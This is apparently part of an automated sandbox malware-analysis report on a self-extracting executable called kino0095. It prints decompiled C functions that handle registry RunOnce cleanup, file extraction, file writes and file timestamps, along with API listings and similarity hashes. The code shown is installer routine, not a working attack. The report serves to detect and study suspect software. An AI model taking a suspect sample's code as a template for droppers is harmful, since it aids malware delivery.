                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010B2F4D,?,00000002,00000000), ref: 010B5201
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010B5250
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                      • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                    • Opcode ID: 89b825fc5d0363581c61f457e2235e05790b8c5ef4433800e6210df5e951a6e5
                                                                                                                                                                                                                                    • Instruction ID: 84677e1845ea5b027beb3771326dfa6d480e698d8f8451a246977c72322039e0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89b825fc5d0363581c61f457e2235e05790b8c5ef4433800e6210df5e951a6e5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F111B2B1702201ABE3656B759CC9FFB72DDEB89784F00446DFAC2E6184EA7E8C014224
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x10b8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                                                    0x010b1fee
                                                                                                                                                                                                                                    0x010b2005
                                                                                                                                                                                                                                    0x010b200d
                                                                                                                                                                                                                                    0x010b2017
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2020
                                                                                                                                                                                                                                    0x010b200d
                                                                                                                                                                                                                                    0x010b2029

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010B538C,?,?,010B538C), ref: 010B2005
                                                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(010B538C,wextract_cleanup1,?,?,010B538C), ref: 010B2017
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(010B538C,?,?,010B538C), ref: 010B2020
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                                                    • API String ID: 849931509-1592051331
                                                                                                                                                                                                                                    • Opcode ID: cc3927ebe264d36675a0d4c1ddec200b54c0178f46fceb64cf6f09c92dd812ad
                                                                                                                                                                                                                                    • Instruction ID: b45cafd70d0887f36f1dd19471ec7838d425fea6309a9115229c7855fd624a3b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc3927ebe264d36675a0d4c1ddec200b54c0178f46fceb64cf6f09c92dd812ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E04F30660318FBEB318A91ECCEFD97B6EE704780F100199BA85A1065E7666A10D718
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E010B4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x10b8004; // 0x72151d89
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x10b91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E010B4E99(_t75);
						L35:
						return E010B6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x10b8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x10b91e4;
						_t58 = 0x10b91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x10b91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x10b91e4;
						_t30 = E010B4702( &_v268, 0x10b91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E010B476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E010B4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E010B47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x10b93f4 =  *0x10b93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x10b91e4;
						_t63 = 0x10b91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x10b91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x10b91e4;
						_t30 = E010B4702( &_v268, 0x10b91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E010B4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E010B4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E010B4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                                                    0x010b4cd0
                                                                                                                                                                                                                                    0x010b4cdb
                                                                                                                                                                                                                                    0x010b4ce0
                                                                                                                                                                                                                                    0x010b4ce2
                                                                                                                                                                                                                                    0x010b4cee
                                                                                                                                                                                                                                    0x010b4cf2
                                                                                                                                                                                                                                    0x010b4d0e
                                                                                                                                                                                                                                    0x010b4d0e
                                                                                                                                                                                                                                    0x010b4d11
                                                                                                                                                                                                                                    0x010b4e83
                                                                                                                                                                                                                                    0x010b4e88
                                                                                                                                                                                                                                    0x010b4e98
                                                                                                                                                                                                                                    0x010b4e98
                                                                                                                                                                                                                                    0x010b4d17
                                                                                                                                                                                                                                    0x010b4d17
                                                                                                                                                                                                                                    0x010b4d1a
                                                                                                                                                                                                                                    0x010b4d2f
                                                                                                                                                                                                                                    0x010b4d2f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d2f
                                                                                                                                                                                                                                    0x010b4d1c
                                                                                                                                                                                                                                    0x010b4d1c
                                                                                                                                                                                                                                    0x010b4d1f
                                                                                                                                                                                                                                    0x010b4dcb
                                                                                                                                                                                                                                    0x010b4dd0
                                                                                                                                                                                                                                    0x010b4dd2
                                                                                                                                                                                                                                    0x010b4ddd
                                                                                                                                                                                                                                    0x010b4ddd
                                                                                                                                                                                                                                    0x010b4de3
                                                                                                                                                                                                                                    0x010b4de8
                                                                                                                                                                                                                                    0x010b4ded
                                                                                                                                                                                                                                    0x010b4ded
                                                                                                                                                                                                                                    0x010b4def
                                                                                                                                                                                                                                    0x010b4df0
                                                                                                                                                                                                                                    0x010b4df0
                                                                                                                                                                                                                                    0x010b4df4
                                                                                                                                                                                                                                    0x010b4df4
                                                                                                                                                                                                                                    0x010b4df6
                                                                                                                                                                                                                                    0x010b4df9
                                                                                                                                                                                                                                    0x010b4dfc
                                                                                                                                                                                                                                    0x010b4dfc
                                                                                                                                                                                                                                    0x010b4dfe
                                                                                                                                                                                                                                    0x010b4dff
                                                                                                                                                                                                                                    0x010b4dff
                                                                                                                                                                                                                                    0x010b4e03
                                                                                                                                                                                                                                    0x010b4e08
                                                                                                                                                                                                                                    0x010b4e0a
                                                                                                                                                                                                                                    0x010b4e0f
                                                                                                                                                                                                                                    0x010b4d03
                                                                                                                                                                                                                                    0x010b4d03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d03
                                                                                                                                                                                                                                    0x010b4e18
                                                                                                                                                                                                                                    0x010b4e20
                                                                                                                                                                                                                                    0x010b4e25
                                                                                                                                                                                                                                    0x010b4e27
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4e33
                                                                                                                                                                                                                                    0x010b4e38
                                                                                                                                                                                                                                    0x010b4e3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4e40
                                                                                                                                                                                                                                    0x010b4e51
                                                                                                                                                                                                                                    0x010b4e56
                                                                                                                                                                                                                                    0x010b4e5b
                                                                                                                                                                                                                                    0x010b4e5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4e6a
                                                                                                                                                                                                                                    0x010b4e6f
                                                                                                                                                                                                                                    0x010b4e71
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4e77
                                                                                                                                                                                                                                    0x010b4e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4e7d
                                                                                                                                                                                                                                    0x010b4d25
                                                                                                                                                                                                                                    0x010b4d25
                                                                                                                                                                                                                                    0x010b4d28
                                                                                                                                                                                                                                    0x010b4d36
                                                                                                                                                                                                                                    0x010b4d3b
                                                                                                                                                                                                                                    0x010b4d40
                                                                                                                                                                                                                                    0x010b4d40
                                                                                                                                                                                                                                    0x010b4d42
                                                                                                                                                                                                                                    0x010b4d43
                                                                                                                                                                                                                                    0x010b4d43
                                                                                                                                                                                                                                    0x010b4d47
                                                                                                                                                                                                                                    0x010b4d4a
                                                                                                                                                                                                                                    0x010b4d4a
                                                                                                                                                                                                                                    0x010b4d4c
                                                                                                                                                                                                                                    0x010b4d4f
                                                                                                                                                                                                                                    0x010b4d4f
                                                                                                                                                                                                                                    0x010b4d51
                                                                                                                                                                                                                                    0x010b4d52
                                                                                                                                                                                                                                    0x010b4d52
                                                                                                                                                                                                                                    0x010b4d56
                                                                                                                                                                                                                                    0x010b4d5b
                                                                                                                                                                                                                                    0x010b4d5d
                                                                                                                                                                                                                                    0x010b4d62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d67
                                                                                                                                                                                                                                    0x010b4d6f
                                                                                                                                                                                                                                    0x010b4d74
                                                                                                                                                                                                                                    0x010b4d76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d7c
                                                                                                                                                                                                                                    0x010b4d84
                                                                                                                                                                                                                                    0x010b4d89
                                                                                                                                                                                                                                    0x010b4d8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d94
                                                                                                                                                                                                                                    0x010b4d99
                                                                                                                                                                                                                                    0x010b4d9e
                                                                                                                                                                                                                                    0x010b4da1
                                                                                                                                                                                                                                    0x010b4daa
                                                                                                                                                                                                                                    0x010b4daa
                                                                                                                                                                                                                                    0x010b4da3
                                                                                                                                                                                                                                    0x010b4da3
                                                                                                                                                                                                                                    0x010b4da3
                                                                                                                                                                                                                                    0x010b4db5
                                                                                                                                                                                                                                    0x010b4dbb
                                                                                                                                                                                                                                    0x010b4dbd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4dc3
                                                                                                                                                                                                                                    0x010b4dc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4dc5
                                                                                                                                                                                                                                    0x010b4dbd
                                                                                                                                                                                                                                    0x010b4d2a
                                                                                                                                                                                                                                    0x010b4d2a
                                                                                                                                                                                                                                    0x010b4d2d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4d2d
                                                                                                                                                                                                                                    0x010b4cf8
                                                                                                                                                                                                                                    0x010b4cfd
                                                                                                                                                                                                                                    0x010b4d02
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010B4DB5
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010B4DDD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                    • API String ID: 3625706803-1116576409
                                                                                                                                                                                                                                    • Opcode ID: fe24079b8ce9c2ea0f017202e6caf22a68b39732e1908f065c44c7eb611f1faf
                                                                                                                                                                                                                                    • Instruction ID: e70bb3be2fd84247dd42a27cc039fc24cc0e89bae9b648dbccd0e4f4614b3787
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe24079b8ce9c2ea0f017202e6caf22a68b39732e1908f065c44c7eb611f1faf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F44122362041068BDF62AE3CD9D46F9B7E5EB45300F0486A8D9D3D7287DA32DB8AC750
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B4C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x10b8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x10b8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                                                    0x010b4c40
                                                                                                                                                                                                                                    0x010b4c4a
                                                                                                                                                                                                                                    0x010b4c8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4c70
                                                                                                                                                                                                                                    0x010b4c70
                                                                                                                                                                                                                                    0x010b4c7e
                                                                                                                                                                                                                                    0x010b4c86
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4c8a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 010B4C54
                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010B4C66
                                                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 010B4C7E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                                                    • Opcode ID: b4cb04e1a79da18ca87fc2b45c89bd2b145ac6ebc023e7ef8daff13eebe4dbae
                                                                                                                                                                                                                                    • Instruction ID: 0c82a3a84b9cc782e864a9d9398d3206be875b13a766e4640a3d269a387a4014
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4cb04e1a79da18ca87fc2b45c89bd2b145ac6ebc023e7ef8daff13eebe4dbae
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15F0967260010DBFABA4DFA8CCC8DFB7BEDEB04640744456BA996C2011EA35DA14C770
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E010B487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E010B490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                                                    0x010b4880
                                                                                                                                                                                                                                    0x010b488c
                                                                                                                                                                                                                                    0x010b4894
                                                                                                                                                                                                                                    0x010b48a0
                                                                                                                                                                                                                                    0x010b48c9
                                                                                                                                                                                                                                    0x010b48ce
                                                                                                                                                                                                                                    0x010b48a2
                                                                                                                                                                                                                                    0x010b48a8
                                                                                                                                                                                                                                    0x010b48b7
                                                                                                                                                                                                                                    0x010b48bc
                                                                                                                                                                                                                                    0x010b48aa
                                                                                                                                                                                                                                    0x010b48ac
                                                                                                                                                                                                                                    0x010b48ac
                                                                                                                                                                                                                                    0x010b48a8
                                                                                                                                                                                                                                    0x010b48de
                                                                                                                                                                                                                                    0x010b48e7
                                                                                                                                                                                                                                    0x010b490b
                                                                                                                                                                                                                                    0x010b48ee
                                                                                                                                                                                                                                    0x010b48f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4902

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010B4A23,?,010B4F67,*MEMCAB,00008000,00000180), ref: 010B48DE
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010B4F67,*MEMCAB,00008000,00000180), ref: 010B4902
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                    • Opcode ID: e76b942797b70466d175e372ecd72b1f89e3a672179403f1fbe8b1944a765885
                                                                                                                                                                                                                                    • Instruction ID: b5d590ee48d1a6d0a60a2c987272c8e4a4aaee05ae4a8b90f4a3924a8852405d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e76b942797b70466d175e372ecd72b1f89e3a672179403f1fbe8b1944a765885
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F0124A3E125702AF26540298CC8BFB595CCB96634F1A0635AEEBE72C2D5684D0482E0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B4AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E010B4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x10b858c; // 0x268
				_t9 = E010B3680(_t20);
				if( *0x10b91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x10b8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x10b9400; // 0xd9e00
							_t15 = _t14 + _t25;
							 *0x10b9400 = _t15;
							if( *0x10b8184 != 0) {
								_t21 =  *0x10b8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10b93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                                                    0x010b4ad5
                                                                                                                                                                                                                                    0x010b4adb
                                                                                                                                                                                                                                    0x010b4ae7
                                                                                                                                                                                                                                    0x010b4aee
                                                                                                                                                                                                                                    0x010b4b05
                                                                                                                                                                                                                                    0x010b4b0d
                                                                                                                                                                                                                                    0x010b4b14
                                                                                                                                                                                                                                    0x010b4b1a
                                                                                                                                                                                                                                    0x010b4b1c
                                                                                                                                                                                                                                    0x010b4b21
                                                                                                                                                                                                                                    0x010b4b2a
                                                                                                                                                                                                                                    0x010b4b2f
                                                                                                                                                                                                                                    0x010b4b31
                                                                                                                                                                                                                                    0x010b4b39
                                                                                                                                                                                                                                    0x010b4b54
                                                                                                                                                                                                                                    0x010b4b54
                                                                                                                                                                                                                                    0x010b4b39
